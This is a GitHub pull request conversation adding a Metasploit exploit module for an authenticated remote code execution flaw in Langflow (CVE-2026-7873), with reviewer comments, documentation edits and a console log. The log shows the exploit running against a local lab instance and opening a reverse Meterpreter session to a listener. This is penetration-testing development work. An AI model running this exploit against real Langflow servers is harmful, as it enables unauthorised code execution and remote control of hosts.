ENH: Exploit module for Langflow authenticated Remote Code Execution vulnerability CVE-2026-7873 - #21877
ENH: Exploit module for Langflow authenticated Remote Code Execution vulnerability CVE-2026-7873#21877rmhowe425 wants to merge 6 commits into
Conversation
|
@jheysel-r7 Looks like this PR was approved? Is it good to go? |
|
Hey @rmhowe425 - while we appreciate @Zdycomp's review, PR's need to be approved by an official member on the Metasploit-Framework commiter's list before they can be landed. I'll try and take a look today - hold tight |
jheysel-r7
left a comment
There was a problem hiding this comment.
Thanks for the module @rmhowe425.
Not a blocker for this PR however I've notice you've got a number of authenticated Langflow modules up that all query the api/v1/version endpoint. That could maybe be moved to a mixin with any other shared functionality if you think that might help!
Testing
msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
smsf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > options
Module options (exploit/multi/http/langflow_auth_rce_cve_2026_7873):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD MetasploitTest!21877 yes LANGFLOW PASSWORD
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 7860 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path of the Langflow application
USERNAME msfadmin yes LANGFLOW USERNAME
VHOST no HTTP server virtual host
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python payload
View the full module info with the info, or info -d command.
msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.8.4 detected, which appears vulnerable.
[*] Sending stage (34540 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:60671) at 2026-10-01 14:21:25 -0700
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : ee56b7d3f28c
OS : Linux 7.0.12-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Aug 27 10:55:53 UTC 2026
Architecture : x64
System Language : C
Meterpreter : python/linux
meterpreter >
| Arbitrary code is executed under the context of the backend Langflow process. | ||
| }, | ||
| 'Author' => [ | ||
| 'Richard Howe <rhowe425>' |
There was a problem hiding this comment.
| 'Richard Howe <rhowe425>' | |
| 'Richard Howe <rhowe425>', # Msf module | |
| 'n0k0' # Discovery |
There was a problem hiding this comment.
Absolutely!
IMHO I think creating that mixin would be worthy of its own dedicated PR. I would be happy to create the GH Issue and jump on that.
Would you agree with this methodology?
There was a problem hiding this comment.
Yea I think that would be the best idea, that way all the PR's that depend on the mixin aren't blocked. We can land all the Langflow modules as they are (after review) and then if you could put up a PR for the mixin and the appropriate refactoring all together, that would be great.
|
@jheysel-r7 Ready for a second round of review! |
| ``` | ||
| sudo docker run -d \ | ||
| --name langflow \ | ||
| -p 192.168.1.30:7860:7860 \ |
There was a problem hiding this comment.
| -p 192.168.1.30:7860:7860 \ | |
| -p 7860:7860 \ |
There was a problem hiding this comment.
Copilot review overview
🟡 Changes recommended
The module must handle malformed version responses without raising an exception; documentation also has noted inconsistencies.
Review effort: Lite
Findings: 1
Open (3)
What changed in this PR
Adds an authenticated Langflow RCE exploit module for CVE-2026-7873 and its documentation.
Changes:
- Implements authentication, version checks, and payload execution.
- Adds setup, verification, and usage documentation.
| File | Summary |
|---|---|
modules/exploits/multi/http/langflow_auth_rce_cve_2026_7873.rb |
Authenticated Langflow RCE implementation |
documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_7873.md |
Installation and usage documentation |
💡 Add a code-review agent skill or configure MCP servers for context-aware, tailored reviews. Learn more in the docs.
| @@ -0,0 +1,63 @@ | |||
| ## Vulnerable Application | |||
| ``` | ||
| sudo docker run -d \ | ||
| --name langflow \ | ||
| -p 192.168.1.30:7860:7860 \ |
Handle version parsing errors with a rescue block. Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
|
@jheysel-r7 ready for a third round of review! |


Description
This pull request adds a new exploit module that detects and exploits an authenticated remote code execution vulnerability impacting Langflow versions 1.0.0 through 1.10.0
Related Issue:
Fixes #21876
Breaking Changes
None
Reviewer Notes
Verification Steps
docker pullanddocker runlangflow, per documentationuse exploit/multi/http/langflow_unauth_rce_cve_2026_7873set rhosts=<rhost> username=<username> password=<password>exploitTest Evidence
Environment
AI Usage Disclosure
None
Pre-Submission Checklist
documentation/modules(new modules only)lib/changes)